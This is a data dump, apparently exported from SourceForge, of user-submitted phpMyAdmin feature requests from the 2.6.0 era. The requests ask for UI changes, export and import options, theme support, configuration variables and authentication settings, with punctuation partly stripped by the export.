SQL query query here [edit] [build php code] pls make the query in one td alone that should make IE able to dblclick or tripple click on it to select the whole query Original URL https sourceforge.net p phpmyadmin feature requests 545 https sourceforge.net p phpmyadmin feature requests 545 Original author xuefer","enhancement"
"24444","5245","import data from OpenOffice Calc.
thanks for hard work to make phpmyadmin successfuly.. can you add feature Import Data from OpenOffice Calc so i can manipulate the data into MySQL... thanks in advance Original URL https sourceforge.net p phpmyadmin feature requests 546 https sourceforge.net p phpmyadmin feature requests 546 Original author anonymous","enhancement"
"24444","5246","Save favorite queries.
I work with phpmyadmin to build my queries easily.
And sometimes I test out some queries before writing the php code.
Now I need to copy paste the queries in a .txt file on my hard drive to save them for later usage.
It would make phpmyadmin really convenient if you could save favourite queries !
Just a suggestion!
; ) Original URL https sourceforge.net p phpmyadmin feature requests 547 https sourceforge.net p phpmyadmin feature requests 547 Original author anonymous","enhancement"
"24444","5247","cross tabulation pivot table.
can you build a simple cross tablulation pivort table so users can make simple analyses Original URL https sourceforge.net p phpmyadmin feature requests 548 https sourceforge.net p phpmyadmin feature requests 548 Original author anonymous","enhancement"
"24444","5248","config.header footer per theme?.
I d like to create a theme for PMA 2.6.0 but to get the look I want, I need a lt;table gt; tag surrounding every page in the left frame.
I could add the tag to the config.header and footer files, but then I would have to tell everyone wanting to use my theme to do the same.
Can we get a config.header and config.footer file as part of the theme?
Original URL https sourceforge.net p phpmyadmin feature requests 549 https sourceforge.net p phpmyadmin feature requests 549 Original author ryandesign","enhancement"
"24444","5249","Remove server list in right frame.
When I set cfg[ LeftDisplayServers ] == TRUE, I get a list of servers in the left frame, but also still have the same list in the right frame.
I d like a way to get rid of the list in the right frame, since it s redundant in this case.
Original URL https sourceforge.net p phpmyadmin feature requests 550 https sourceforge.net p phpmyadmin feature requests 550 Original author ryandesign","enhancement"
"24444","5250","Export to AXMLS ADOdb format.
It would be very useful feature to export MySQL tables into cross database format, such as AXMLS to create table schemas for other DB types.
Since phpMyAdmin is able to export to XML already there should not be any problems to transform output XML into AXMLS.
More Info http phplens.com lens adodb docs datadict.htm AXMLS DTD is attached Original URL https sourceforge.net p phpmyadmin feature requests 551 https sourceforge.net p phpmyadmin feature requests 551 Original author techtonik","enhancement"
"24444","5251","Session timeout variable needed.
I have noticed that 2.6.0 beta 2 times out pretty quickly and I d like it not to timeout so quickly and I think the best way to fix that would be to add a new global variable in the config file to set the session timeout.
Original URL https sourceforge.net p phpmyadmin feature requests 553 https sourceforge.net p phpmyadmin feature requests 553 Original author luegner","enhancement"
"24444","5252","php user auth feature.
I was wondering if it would be a great idea to implant a feature into phpMyAdmin where you can select a table that you want to use for php user auth on your website, like it can create a login box and code that has all the added securities such as sql injections etc.
Original URL https sourceforge.net p phpmyadmin feature requests 552 https sourceforge.net p phpmyadmin feature requests 552 Original author drag0n69","enhancement"
"24444","5253","Default to HTTP authentication.
Would it be possbile to change the default authentication from config to http?
For config, you normally have to edit config.inc.php anyway to add the username password, while for http this isn t necessary.
I m not sure, but I think http is more used than config too.
Original URL https sourceforge.net p phpmyadmin feature requests 554 https sourceforge.net p phpmyadmin feature requests 554 Original author olafvdspek","enhancement"
"24444","5254","Index selected fileds in table structure view.
in table structure view below the Table, add a button or a button for each index type) for creating index for selected fields like already exists for drop and change Original URL https sourceforge.net p phpmyadmin feature requests 555 https sourceforge.net p phpmyadmin feature requests 555 Original author cybot tm","enhancement"
"24444","5255","replace select all deselect all with a tfoot row.
in table structure view table browse view database structure view server database view replace the Check all Uncheck all .... with lt;tfoot gt; lt;td gt; lt;input type checkbox .. gt; lt; td gt; lt;td gt;... same tools as for single rows ... lt; td gt; lt;td gt;... additional tools for all rows ... lt; td gt; lt; tfoot gt; The checkbox has same functionality as the current javascript behind Check all Uncheck all , additionally it should also work with JavaScript disabled.
This checkbox can also be a drop down select, f.e.
for the database structure view, where is an additional select method overheaded) Original URL https sourceforge.net p phpmyadmin feature requests 556 https sourceforge.net p phpmyadmin feature requests 556 Original author cybot tm","enhancement"
"24444","5256","php extension to MS SQL for phpMyAdmin.
extension to MS SQL for PhpMyAdmin.
Original URL https sourceforge.net p phpmyadmin feature requests 557 https sourceforge.net p phpmyadmin feature requests 557 Original author anonymous","enhancement"
"24444","5257","Clear Screen when Logout.
I just downloaded PHPMyAdmin 2.6.0 Beta 2, very nice... only one thing I use HTTP Authentication, it s great, the logout works in this version, but.... if I logout, the login window pops up again, this is good, however, it does not clear the screen behind the login window, of the last session, until you do something like press cancel on that login window.
Someone could still read the last screen like this.
I think it would be a good idea to clear the screen upon logout, THEN display the login window, floating on top of the cleared screen, rather than old data.
I use FireFox 0.9.2 and HTTP Authentication Original URL https sourceforge.net p phpmyadmin feature requests 558 https sourceforge.net p phpmyadmin feature requests 558 Original author robvdl","enhancement"
"24444","5258","Themes need names.
Allow a theme to specify in its colors.inc.php a name for the theme.
It s kinda ugly to identify themes in the user interface only by the name of their directory.
Original URL https sourceforge.net p phpmyadmin feature requests 559 https sourceforge.net p phpmyadmin feature requests 559 Original author ryandesign","enhancement"
"24444","5259","Themes need minimum PMA version.
Allow a theme to specify in its colors.inc.php a minimum version of PMA with which it will work.
If you consider that PMA s themability has only just begun and will likely expand in the future, and if you envision eventual 3rd party themes that may be distributed separate from PMA, then it would be a bad idea for a user to install a theme designed for, say, PMA 2.7.1 into PMA 2.6.0.
It wouldn t look right, and the user might never know that it wasn t supposed to look that way.
PMA should either only show in the menu those themes that work with that PMA version, or an error message could be displayed on the main menu the way it is when certain other config options are incorrect) informing the user that they need to upgrade PMA to use theme x .
Original URL https sourceforge.net p phpmyadmin feature requests 560 https sourceforge.net p phpmyadmin feature requests 560 Original author ryandesign","enhancement"
"24444","5260","Server List > Unordered List.
Would prefer if the server list links were in an unordered list.
Then they d get the triangle graphic to their left, just like the other items on the main menu, and it would improve the look.
As it is now, you re using this amp;raquo; entity before each item in the server list, and I don t see why it should be different like that.
Original URL https sourceforge.net p phpmyadmin feature requests 561 https sourceforge.net p phpmyadmin feature requests 561 Original author ryandesign","enhancement"
"24444","5261","Allow exporting to be based off of a sql statement.
It would be nice to allow a SQL statement in the export area.
An example for this would be that I only want to backup a certain part of the database based off of some SQL statement.
I then manipulate the fields that need manipulated.
Something went wrong, I delete the fields based off of the same SQL statement and then want to load the backup i did from the SQL statement.
My reasoning is that i m working with a database that is 1.6GB and there are 2 tables that are over 500MB.
It would be nice to backup just parts of these tables instead of backing up the whole table and then importing the whole table again.
GrimReapa securifirm at hotmail.com Original URL https sourceforge.net p phpmyadmin feature requests 562 https sourceforge.net p phpmyadmin feature requests 562 Original author anonymous","enhancement"
"24444","5262","left upper frame is using too much space.
i think the left upper frame is using too much space, cause you only need it sometimes.
i think the top icons should use only exact the space, they need about16px) and the lt;hr gt; lines are not needed, and the word Database is not needed either.
this could all be the option for cfg[ LeftDisplayLogo ] =FALSE anyway, i like the new design.
only the orange is a bit too strong ;) Original URL https sourceforge.net p phpmyadmin feature requests 563 https sourceforge.net p phpmyadmin feature requests 563 Original author rubo77","enhancement"
"24444","5263","SQLite support.
In php5 added support for SQLite.
Can you modify phpmyadmin to work with sqllite?
sincerelly yours phpDeveloper.
Original URL https sourceforge.net p phpmyadmin feature requests 564 https sourceforge.net p phpmyadmin feature requests 564 Original author anonymous","enhancement"
"24444","5264","Make the <hr > style match eachother ?.
Hello everyone, I ve taken notice in phpMyAdmin 2.6.0 that you ve redone the design.
One thing that makes me question is the lt;hr gt; tags that you use in there.
On the upper left hand side, you use a standard lt;hr gt; tag that has a shadow and no edited effect.
Whereas if you are browsing any page on the right hand side, it is more flat and much cooler looking in my opinion).
I think it would be relevant if both the left side and the right side matched.
Thanks.
Best of luck to you, Mike Sadowski.
Original URL https sourceforge.net p phpmyadmin feature requests 565 https sourceforge.net p phpmyadmin feature requests 565 Original author izcool","enhancement"
"24444","5265","Make the <script> Tags Match Eachother.
Hello again, I ve just taken a look at a few pages of phpMyAdmin 2.6.0 and I ve noticed that you like to switch from one lt;script gt; tag to another, to another, to another.
This is what I mean...
Sometimes I see this lt;script language= JavaScript type= text javascript gt; Other times I see this lt;script type= text javascript language= javascript gt; And at other times I see this instead lt;script type= text javascript gt; I think you get the point now..
But I think it would be much more professional if you kept to one style of writing that tag.
Best of luck to all of you, Mike Sadowski.
Original URL https sourceforge.net p phpmyadmin feature requests 566 https sourceforge.net p phpmyadmin feature requests 566 Original author izcool","enhancement"
"24444","5266","Make copy of database.
It would be nice to have a way to make an exact duplicate of a database as a new name.
Like a Save Database As functionality.
Like The need for this would be for branching off development and then adding changes back in later.
Original URL https sourceforge.net p phpmyadmin feature requests 567 https sourceforge.net p phpmyadmin feature requests 567 Original author sayle m","enhancement"
"24444","5267","Provide Favicon to avoid errorlog entries.
I think phpMyAdmin should contain a favicon to avoid HTTP error logs, because browsers seem to expect a favicon.ico in the root directory.
Original URL https sourceforge.net p phpmyadmin feature requests 568 https sourceforge.net p phpmyadmin feature requests 568 Original author anonymous","enhancement"
"24444","5268","Load Save Query By Example.
It would be nice if I could load and save the Query By Example Pages on the Query page.
I know you can load and save SQL queries, it shouldn t be too hard to load and save a QBE page.
Original URL https sourceforge.net p phpmyadmin feature requests 569 https sourceforge.net p phpmyadmin feature requests 569 Original author anonymous","enhancement"
"24444","5269","NDB Cluster table engine.
Need support for ndbcluster table type engine).
Only for create table want to choose table type like ndbcluster.
Maybe something else around ndbcluster type if you want, but create table ... type=ndbcluster is most important.
Original URL https sourceforge.net p phpmyadmin feature requests 570 https sourceforge.net p phpmyadmin feature requests 570 Original author anonymous","enhancement"
"24444","5270","showing result count.
i dont know if this still does it in newer versions than 2.5.6, but when you do a query, it says you are viewing 0 29 30 total).... why dont you have it say 1 30 30 total) ?
Original URL https sourceforge.net p phpmyadmin feature requests 571 https sourceforge.net p phpmyadmin feature requests 571 Original author anonymous","enhancement"
"24444","5271","Tab Button Order.
When editing multiple records it would nice to have the Tab button advance in the correct order the next field in line).
Currently it seems to be fairly sporadic jumps all over the place even between fields in different records).
Original URL https sourceforge.net p phpmyadmin feature requests 572 https sourceforge.net p phpmyadmin feature requests 572 Original author anonymous","enhancement"
"24444","5272","Side Nav Icons Select Table).
The Browse icon in left.php is incredibly useful.
I was always wanting to select a table here as well so I added another icon to the left of the browse icon.
Please add an option to display a Select icon in addition to the normal Browse icon.
Thanks Original URL https sourceforge.net p phpmyadmin feature requests 573 https sourceforge.net p phpmyadmin feature requests 573 Original author anonymous","enhancement"
"24444","5273","Database Dump; escape sql keywords.
Annoyingly when I dumped my database, I found SQL errors in creating some tables thats because I had chosen poor names for fields in tables...
So; when dumping, if a table name or field or anything is an SQL keyword, wrap it in backticks!
Saves a lot of heckles...
Original URL https sourceforge.net p phpmyadmin feature requests 574 https sourceforge.net p phpmyadmin feature requests 574 Original author clockwerx","enhancement"
"24444","5274","Tabs should stay above message.
It s a little bit difficult to explain what I mean especially in a foreign language) Please, let the top two navigation bars in left frame) allways in the same position.
The 1st navbar [server] [database] [table] seems to be allways in same place.
But the 2nd navbar [Structure] [Browse] [SQL] [Search] [Insert] [Export] [Operations] [Empty] [Drop] is moved down below the Your SQL query has been executed successfully block) after execution of [Operations] Alter table order by .
See attached screenshots pic1.png before Alter table order by pic2.png past Alter table order by I hope it is clear what I mean.
Original URL https sourceforge.net p phpmyadmin feature requests 575 https sourceforge.net p phpmyadmin feature requests 575 Original author mandabaer","enhancement"
"24444","5275","adding tables to a PDF page.
phpMyAdmin is cool, thx for it!
my requested feature posibility to add MORE tables to a PDF page by only one click because it s easy to use visual tool to manipulate tables, but it s very slow to add ie.
20 tables to one PDF page, so Select Multiple would be ideal... ;) thx a lot!
gapon Original URL https sourceforge.net p phpmyadmin feature requests 576 https sourceforge.net p phpmyadmin feature requests 576 Original author anonymous","enhancement"
"24444","5276","Hierarchical Navigation in Left Frame.
There s a web based administration tool much like this one, but for PostgreSQL.
It has a fancy navigation menu in it s left frame that would be really snazzy in phpMyAdmin.
Enterprise Manager for Microsoft SQL works the same way, makes it easier to get around.
Matthew dot Clark at Divergent hyphen Systems dot com Original URL https sourceforge.net p phpmyadmin feature requests 577 https sourceforge.net p phpmyadmin feature requests 577 Original author anonymous","enhancement"
"24444","5277","tables overview comments saving sql queries.
it would be great to add the table comments on the database overview page, in a column on the right of the overhead column.
this is usefull when you re working on and switching between several databases, where you have to recap the function or use of every table.
or just had a few days of and have to dive into the structure again.
dunno if possible but adding field comments would be nice too.
that s probably not possible in mysql, but maybe as an add on in phpmyadmin... is there a common way or api for expanding phpmyadmin with custom built scripts and utils?
lbnl a favorites mechanism for storing sql queries, including comments.
just a few ideas.
keep up the good work!
Original URL https sourceforge.net p phpmyadmin feature requests 578 https sourceforge.net p phpmyadmin feature requests 578 Original author anonymous","enhancement"
"24444","5278","able to copy query when no query box.
it s useful to copy query string into clipboard not only make php code for those system browser don t support clipboard i suggest common.lib.php Displays the message echo lt;b gt; .
GLOBALS [ strSQLQuery ] .
lt; b gt; amp;nbsp; ; echo lt;br gt; .
\n ; echo lt;div gt; ; echo .
query base; echo lt; div gt; ; simple yet powerful after div is added, we can doublt tripple click on query base string to select the whole query without other unnecessary text then press copy ctrl c or whatever browser provide) Original URL https sourceforge.net p phpmyadmin feature requests 579 https sourceforge.net p phpmyadmin feature requests 579 Original author xuefer","enhancement"
"24444","5279","Support for binlogs.
Hi!
It would be great if there was support to view log files, especially events.
Right now I have to do mysql gt; show binlog events and hope it displays ok.
If there was an option to view this data on the server that would be great.
Thanks, keep up the excellent work!
Original URL https sourceforge.net p phpmyadmin feature requests 580 https sourceforge.net p phpmyadmin feature requests 580 Original author m3avrck","enhancement"
"24444","5280","Can primary frame remember context for refresh.
At the moment, when you hit the browser refresh button, phpMyAdmin loses the context you are in, and refreshes back to the default page.
This is one of the major frustrations of the frames model, and the reason many people have argued for a non frames version.
I don t want to get into that religeous war over frames, but I feel that more people, including myself, would be happy if there was a way that context could be retained on a browser refresh, at least to the point of remembering which database was selected, ideally to remember where it was in a results page.
I have tried to get into the habit of right mouse button refreshing the results frame, but keep forgetting.
jolyon mways.co.uk Original URL https sourceforge.net p phpmyadmin feature requests 581 https sourceforge.net p phpmyadmin feature requests 581 Original author anonymous","enhancement"
"24444","5281","Refresh left frame.
I prefer to work with more than 1 window with phpMyAdmin.
And sometimes I create a new table or database in window A, in window B the left frame is still the same with the old tables and databases.
If I press the F5 it will refresh both frames and no database is selected.
My idea is to add a link button in the left frame that refreshes that frame so you don t have to select the same database ect.
Original URL https sourceforge.net p phpmyadmin feature requests 582 https sourceforge.net p phpmyadmin feature requests 582 Original author anonymous","enhancement"
"24444","5282","root access limitation in variable.
I have to edit an array to negate root access can you put a simple field to do this?
for exemple Root access = FALSE ; TRUE or FALSE deny root from all , deny root from localhost Original URL https sourceforge.net p phpmyadmin feature requests 583 https sourceforge.net p phpmyadmin feature requests 583 Original author lotabi","enhancement"
"24444","5283","exporting multiple row query with variables.
hi, exporting the result of multiple queries containing variables didn t work export link at bottom of result page).
because sql query contains only the last query.
is there any possibility to submit all query elements.
i.e.
SET a=10; SELECT b =20; SELECT a, b; like sql query=SET 40a 3D10 3B SELECT 40b 3A 3D20 3B SELECT 40a 2C 40b 3B this also affect tbl properties export.php.
i just have no idea wether its a bug or a feature ;) martin Original URL https sourceforge.net p phpmyadmin feature requests 584 https sourceforge.net p phpmyadmin feature requests 584 Original author ma2sc","enhancement"
"24444","5284","mysqli Support.
How about mysqli support?
any planning for this?
Original URL https sourceforge.net p phpmyadmin feature requests 585 https sourceforge.net p phpmyadmin feature requests 585 Original author anonymous","enhancement"
"24444","5285","benchmark tool for sql queries.
would be nice if phpmyadmin could support some benchmark tools.
e.g.
if you have on query that can do the same operations that two other querys and you don t know which method is faster.
then you use the benkmark tool which executes every method a 1000 times an returns you the avg.
execution time!
this is just an example.
i m sure there are a lot of other applications for which a benchmark tool would be very usefull!
Original URL https sourceforge.net p phpmyadmin feature requests 586 https sourceforge.net p phpmyadmin feature requests 586 Original author anonymous","enhancement"
"24444","5286","Export extended inserts max number of rows.
when I export a table which has over 10.000 lines 1.4 MB) I got a error.
When I split this into two dumps, then it works.
Why you dont give an option that the export will create a dump with a max number of lines per query, and then start the next INSERT query, and next, ... .
The default will be that it is only one query, and when I say only 5.000 lines per query, then it will be done.
Original URL https sourceforge.net p phpmyadmin feature requests 587 https sourceforge.net p phpmyadmin feature requests 587 Original author anonymous","enhancement"
"24444","5287","XHTML 1.1 with no tables for layouts..
If it is possible, I would like to have phpMyAdmin to come with XHTML 1.1 without tables for layouts.
That means no misuse of HTML tags.
Use advanced CSS to layout pages and ideally, accessible.
Original URL https sourceforge.net p phpmyadmin feature requests 588 https sourceforge.net p phpmyadmin feature requests 588 Original author anonymous","enhancement"
"24444","5288","importing LOAD DATA statement.
How about offering a choice on the same page a) the path you entered is on the browsers drive and should be uploaded by phpMyAdmin b) the path you entered is local to the server so no upload is necessary See the discussion on http sourceforge.net forum forum.php?
thread id=1126684 forum id=72909 Original URL https sourceforge.net p phpmyadmin feature requests 589 https sourceforge.net p phpmyadmin feature requests 589 Original author mauricedelaat","enhancement"
"24444","5289","Textbox where I can insert the db name to jump to directly.
Would it be possible to add a textbox on the welcome page or on the frame on the left where I can type the name of a database and then directly jump to it like the select box in the left frame does?
I have a server with a lot of databases, and so it takes quite a time to load the frame on the left and then to find a database and jump to it.
A textbox would make that a lot easier.
Original URL https sourceforge.net p phpmyadmin feature requests 590 https sourceforge.net p phpmyadmin feature requests 590 Original author wagnerp","enhancement"
"24444","5290","Command line script to export and import database dump.
It will be very nice to be able to import or export a phpmyadmin database dump using a command line script.
Original URL https sourceforge.net p phpmyadmin feature requests 591 https sourceforge.net p phpmyadmin feature requests 591 Original author anonymous","enhancement"
"24444","5291","Class C B A additions to IP Address Shortcuts.
This is a very handy addition to the ip address restriction capabilities, where you need to deploy phpmyadmin remotely, with a basic level of security usability, but are not sure of the remote IP address.
The following modifications to libraries ip allow deny.lib.php allow you to specify localC localB localA as ip address aliases within the config file AllowDeny setting Old copy rule database rules = cfg[ Server ][ AllowDeny ][ rules ]; shortcuts = array all = gt; 0.0.0.0 0 , localhost = gt; 127.0.0.1 8 ); New rules = cfg[ Server ][ AllowDeny ][ rules ]; serveraddr= SERVER[ SERVER ADDR ]; lookup table for some name shortcuts shortcuts = array all = gt; 0.0.0.0 0 , localhost = gt; 127.0.0.1 8 , localC = gt; serveraddr 24 , localB = gt; serveraddr 16 , localA = gt; serveraddr 8 ); This will allow you to do something like this in the config file Allow from localhost, the local class C, and non routable addresses cfg[ Servers ][ i][ AllowDeny ][ rules ] = array allow from localhost , allow from localC , allow from 10.0.0.1 8 , allow from 192.168.0.1 16 ); Original URL https sourceforge.net p phpmyadmin feature requests 592 https sourceforge.net p phpmyadmin feature requests 592 Original author redphoenix","enhancement"
"24444","5292","Support zip import.
I tried to export a full database in zipped format and then, when I imported it to another mySQL DB, using the SQL Import function of phpMyAdmin I got a parser error.
The same export database in gzipped format works and in plain text works as well.
Could it be a problem in the zip compression or something like this?
Marcello MySQL 4.0.18 nt PMA 2.6.0 rc2 PHP VER,OS 4.3.4 WINNT The full error message is reported here after There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below ............. ERROR C1 C2 LEN 2 3 660 STR x03 CVS Id sqlparser.lib.php,v 2.23 2004 08 09 01 22 59 lem9 Exp MySQL 4.0.18 nt USR OS, AGENT, VER Win MOZILLA 5.0 PMA 2.6.0 rc2 PHP VER,OS 4.3.4 WINNT LANG en iso 8859 1 SQL PKx03x04x14 Original URL https sourceforge.net p phpmyadmin feature requests 593 https sourceforge.net p phpmyadmin feature requests 593 Original author anonymous","enhancement"
"24444","5293","Allow download BLOB fields.
It will be nice if BLOB values can be downloaded.
I know about ShowBlob configuration option but I don t want to edit the field, just upload which is currently possible) and download which is not).
Original URL https sourceforge.net p phpmyadmin feature requests 594 https sourceforge.net p phpmyadmin feature requests 594 Original author jakubvrana","enhancement"
"24444","5294","Config.
variable for default collation connection.
Using MySQL 4.1.4 and phpMyAdmin 2.6.0 rc2.
My MySQL database has the default collation of latin1 swedish ci, which accounding to the MySQL docs, is the most common one.
phpMyAdmin comes with a default collation connection of utf8 general ci.
That can be changed on the home page by choosing from a drop down list.
But, I need to tell all users in my company to manually make that change, else they get the error 1267 Illegal mix of collations latin1 swedish ci,IMPLICIT) and utf8 general ci,COERCIBLE) for operation = If I could instead modify a config variable in config.inc.php, that would be much easier.
As a temp.
workaround for my site, I followed lem9 s advice and modified libraries common.lib.php.
If the cookie does not contain a value for collation connection, I hardcode it to latin1 swedish ci .
If instead, that could come from a config variable, that would be great.
Thanks!
smeed1 mac.com Original URL https sourceforge.net p phpmyadmin feature requests 595 https sourceforge.net p phpmyadmin feature requests 595 Original author anonymous","enhancement"
"24444","5295","Smaller logo images.
The new UI is very nice, however the phpMyAdmin logos are now quite bulky, taking up a large amount of screen real estate.
I understand that it is possible to edit these post install, however it would be nice if the default install didn t have logos that were quite so in your face ) Original URL https sourceforge.net p phpmyadmin feature requests 596 https sourceforge.net p phpmyadmin feature requests 596 Original author anonymous","enhancement"
"24444","5296","config.inc default database.
One variable I d like to see included in pma s config.inc is cfg[ Servers ][ i][ default db ] for setting the default database to select after authentication, versus opening no database, and starting with the pma front page.
That would be helpful, since most of the time, I am accessing the same database, and it would save an additional step to not have to select it.
It s also not a rehash of cfg[ Servers ][ i][ only db ], since I don t want to use only one or more) databases.
Thanks guys!
Steve Original URL https sourceforge.net p phpmyadmin feature requests 597 https sourceforge.net p phpmyadmin feature requests 597 Original author sdibb","enhancement"
"24444","5297","Use The Coolest DHTML Calendar Widget.
You should give The Coolest DHTML Calendar lt;http freshmeat.net projects jscalendar gt; lt;http sourceforge.net projects jscalendar gt; a look as a replacement option for your current popup calendar.
It s simply amazing!
It s sophistication, in my opinion, is rivaled only by the likes of phpMyAdmin itself!
It s so full featured and it s impressively compatible with different browsers.
Give it a look!
=) Original URL https sourceforge.net p phpmyadmin feature requests 598 https sourceforge.net p phpmyadmin feature requests 598 Original author traviscarden","enhancement"
"24444","5298","Allow editing when table has no primary unique key.
Hi, When I insert a piece of HTML into a text field, I can t edit it with phpMyAdmin anymore.
Apache 2.0.50 Win32) MySQL 4.0.21 nt PHP 4.3.8 phpMyAdmin 2.5.7 pl1 Internet Explorer 6 Mozilla Firefox If needed, I can give you access to this server.
SQL statements CREATE TABLE xwi config name varchar 255) NOT NULL default , value text NOT NULL ) TYPE=MyISAM; INSERT INTO xwi config name, value) VALUES listen port , 4000 ), listen port , 4005 ), listen port , 4007 ), players per serial , 4 ), html top , lt;!DOCTYPE HTML PUBLIC W3C DTD HTML 4.01 Transitional EN gt;\r\n lt;link rel=stylesheet href= http xwis.net egx.css gt; lt;title gt;XCC WOL IRC Server lt; title gt; lt;table width= 100 gt; lt;tr gt; lt;td gt; lt;p class=page title gt;XCC WOL IRC Server\r\n lt; table gt; ), html botto2 , lt;table width= 100 gt;\r\n lt;tr gt;\r\n lt;td valign=top gt;\r\n lt;a href= http champ site.com gt;Champ Site lt; a gt; |\r\n lt;a href= http communityteam.de gt;Community Team lt; a gt; |\r\n lt;a href= http dune2k.com gt;FED2k lt; a gt; |\r\n lt;a href= http strike team.net gt;Strike Team lt; a gt; |\r\n lt;a href= http xccu.sourceforge.net gt;XCC Home Page lt; a gt;\r\n lt;tr gt;\r\n lt;td align=center colspan=3 gt;\r\n lt;p gt;\r\n lt;a href= https www.paypal.com xclick business=st xcl 40hotmail.com amp;amp;item name=XCL Fund amp;amp;image ur l=http 3A xccu.sourceforge.net button.gif amp;amp;no shipping=1 amp;amp;no note=1 amp;amp;cs=1 amp;amp;tax=0 amp;amp;currency c ode=GBP gt; lt;img src= https www.paypal.com images x click but04.gif alt= PayPal Donate gt; lt; a gt;\r\n lt;p gt;\r\n lt;script language= JavaScript type= text javascript src= http m1.nedstatbasic.net basic.js gt;\r\n lt; script gt;\r\n lt;script language= JavaScript type= text javascript gt;\r\n lt;!
\r\n nedstatbasic ACYaRA5mKkSNw9DcBlC vYnGi83A , 0);\r\n gt;\r\n lt; script gt;\r\n\r\n lt;noscript gt;\r\n lt;a target= blank href= http v1.nedstatbasic.net stats?
ACYaRA5mKkSNw9DcBlC vYnGi83A gt; lt;img src= http m1.nedstatbasic.net n?
id=ACYTXwDHntQULdYZIrOjZRmDVgjQ alt= NedStat Statistics gt; lt; a gt;\r\n lt; noscript gt;\r\n lt;p gt;\r\n lt;a href= http communityteam.de gt; lt;img src= http communityteam.de images banner ct banner.
gif alt= Community Team gt; lt; a gt;\r\n lt; table gt; ); Original URL https sourceforge.net p phpmyadmin feature requests 599 https sourceforge.net p phpmyadmin feature requests 599 Original author olafvdspek","enhancement"
"24444","5299","Resizable form fields CSS).
Please consider an opportunity to add CSS style file that contains instructions for form fields fit to width feature.
For example, it is possible to specify CSS style to various form fields like a textarea, select and other) that they occupied all empty space on page.
Otherwise it is very inconvenient to edit contents because of fields that have small and fixed width.
Original URL https sourceforge.net p phpmyadmin feature requests 600 https sourceforge.net p phpmyadmin feature requests 600 Original author anonymous","enhancement"
"24444","5300","Add use create database to export.
It would be useful if the export had an option to add a use DB NAME to the top of the export of either a table or a whole database.
It would also be useful if there were an option to add create database DB NAME to the database export option.
Both would be off by default.
Original URL https sourceforge.net p phpmyadmin feature requests 601 https sourceforge.net p phpmyadmin feature requests 601 Original author hollymcr","enhancement"
"24444","5301","Single sign on support pubcookie, cosign, et al).
I would like to use phpMyAdmin in a single sign on environment.
I personally plan to use pubcookie, though cosign works in a similar way, and I would imagine some other SSO solutions would as well.
Has any work been done in PMA for SSO support yet?
If not, I could work on it.
Original URL https sourceforge.net p phpmyadmin feature requests 602 https sourceforge.net p phpmyadmin feature requests 602 Original author ryandesign","enhancement"
"24444","5302","Import from Url.
It will be nice if we can not only upload a sql data file, but specify a web location maybe on the same server.
thx subarea Original URL https sourceforge.net p phpmyadmin feature requests 605 https sourceforge.net p phpmyadmin feature requests 605 Original author anonymous","enhancement"
"24444","5303","Export Filter Table Columns.
It would be nice to be able to choose which columns in a table to include when exporting that table because not all of the columns are always needed when exporting table data.
Original URL https sourceforge.net p phpmyadmin feature requests 603 https sourceforge.net p phpmyadmin feature requests 603 Original author luegner","enhancement"
"24444","5304","Use framespacing= 1 .
in index.php in line 115 PLEASE change framespacing= 0 to framespacing= 1 result in Opera browsers one can change the size of the left frame by mouse.
THANKS!
Original URL https sourceforge.net p phpmyadmin feature requests 606 https sourceforge.net p phpmyadmin feature requests 606 Original author anonymous","enhancement"
"24444","5305","Fast access to DB.
I m sorry, i speak english not very good, but anyway...
When I use phpMyAdmin, I very often use some db not constant).
It would be very comfortably to access to my DB through URL.
May be I tell not clear...
I tell by the example gt; http mysql phpMyAdmin Home Page gt; http mysql mydb phpMyAdmin MyDB page if I select MyDB in select field in top and left) gt; http mysql anotherdb phpMyAdmin AnotherDB It would be very comfortably!!
I hope you understand about what I tell you.
Thank You!
Original URL https sourceforge.net p phpmyadmin feature requests 604 https sourceforge.net p phpmyadmin feature requests 604 Original author anonymous","enhancement"
"24444","5306","Add a link by MySQL Error 1062 Duplicate entry.
Hi, if you want to make a field in a table unique, but you have an duplicate entry this error is shown SQL query ALTER TABLE `xyz` ADD UNIQUE `fieldxyz` ) MySQL said Documentation 1062 Duplicate entry F K for key 2 So, then it would be nice, if there were a link, which makes a SELECT FROM `xyz` WHERE `fieldxyz` LIKE F K .
Because that is much more quicklier than do that by hand, and i guess this would be used very often.
Thanks for your excellent job Original URL https sourceforge.net p phpmyadmin feature requests 607 https sourceforge.net p phpmyadmin feature requests 607 Original author lykurg","enhancement"
"24444","5307","Title attribute for edit icon in privileges list.
This applies to version 2.6.0.
To provide tooltip functionality in standard compliant browsers that support it, I d like to suggest the following in server privileges.php, line 976, add title= .
strEdit .
to the end of the image element.
Thanks, Sanne Original URL https sourceforge.net p phpmyadmin feature requests 608 https sourceforge.net p phpmyadmin feature requests 608 Original author anonymous","enhancement"
"24444","5308","Interface consistency.
All simmilar functionality should have simmilar layout, but it is not truth now.
Take a look at creating table and creating index.
Once you have title, second does not have, once otions are below attributes and in second above.
We should make some rules how to make such forms and then change their layout.
Original URL https sourceforge.net p phpmyadmin feature requests 609 https sourceforge.net p phpmyadmin feature requests 609 Original author nijel","enhancement"
"24444","5309","Show All stopped at row 880 of 1625 total.
I have 1625 rows in a table and when I tried to perform a Show All, the following error occurred it stopped displaying rows at 880) Fatal error Allowed memory size of 8388608 bytes exhausted tried to allocate 14592 bytes) in opt apache htdocs phpmyadmin libraries display tbl links.lib.php on line 25 The machine I m running this on has 1GB of RAM and is a dual processor system.
I used the my medium.cnf as a foundation for configuring MySQL.
The only difference is that InnoDB tables are enabled because that s what I m using.
Original URL https sourceforge.net p phpmyadmin feature requests 611 https sourceforge.net p phpmyadmin feature requests 611 Original author bbisaillon","enhancement"
"24444","5310","OLD PASSWORD ) option in change password.
Users using old versions of PHP and newer versions of mysql can t connect to the server and get this Client does not support authentication protocol requested by server; consider upgrading MySQL client To solve this, you have to type quoting from the mysql manual) mysql gt; SET PASSWORD FOR gt; some user some host = OLD PASSWORD newpwd ); Alternatively, use UPDATE and FLUSH PRIVILEGES mysql gt; UPDATE mysql.user SET Password = OLD PASSWORD newpwd ) gt; WHERE Host = some host AND User = some user ; mysql gt; FLUSH PRIVILEGES; It would be very useful if phpMyAdmin had the option to use the old password algorithm while setting up new users or editing them.
